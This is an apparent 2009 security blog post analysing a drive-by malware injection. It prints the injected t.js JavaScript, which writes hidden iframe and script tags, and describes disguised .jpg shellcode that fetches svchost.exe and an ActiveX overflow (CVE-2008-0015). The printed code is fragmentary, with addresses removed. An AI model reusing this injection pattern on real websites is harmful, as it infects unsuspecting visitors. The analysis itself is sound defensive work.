Blog for hpHosts, and whatever else I feel like writing about ....

Thursday, 9 July 2009 - A quick analysis

I thought I'd give you guys a quick analysis of what (IP:, as mentioned by DNS-BH, actually does. The first thing we need to look at, is the contents of t.js;

var s,siteUrl,tmpdomain;
var arydomain = new Array("","");
s = document.location+"";
tmpdomain = 0;
for(var i=0;i<arydomain.length; i++)
if(siteUrl.indexOf(arydomain[i]) > -1){
tmpdomain = 1;
if(tmpdomain == 0){
document.writeln("<iframe src= width=0 height=0></iframe>");
document.write ('<script type="text/javascript" src=""></script><noscript><a href=""><img src=""/></a></noscript>');

From here, we can see that it is loading an iFrame to ( - AS4134), based on whether tmpdomain is equal to zero (which is based on whether or not the URL matches any of the items in the arydomain array). This iFrame, then loads another iframe to index.htm which contains;

<div id="DivID">
<script src='go.jpg'></script>
<script src='go1.jpg'></script>

You'll not be surprised to learn that these .jpg files, aren't infact, .jpg files. go.jpg contains the shell code;

If we run this through Wepawet (saves us alot of time), we see it grabs a file called svchost.exe from ( - AS4134), MD5: 78ffb67eb9e8ec2886fcb5e32c916333;

Detection for this is pretty good, with 28/41 vendors currently detecting it;

go1.jpg attempts a buffer overflow (CVE-2008-0015), and detection is sadly, rubbish;


vURL Online -

hpHosts - 261 Domains listed resolving to: 59.34.197.

Microsoft Security Advisory (972890) - Vulnerability in Microsoft Video ActiveX Control Could Allow Remote Code Execution

Google Diagnostic - AS4134

IE 0day exploit domains (constantly updated)

IE (msvidctl.dll) to 0-day attack (Google translation)

New MS 0-day ActiveX (MSVidCtl dll exploit)

No comments: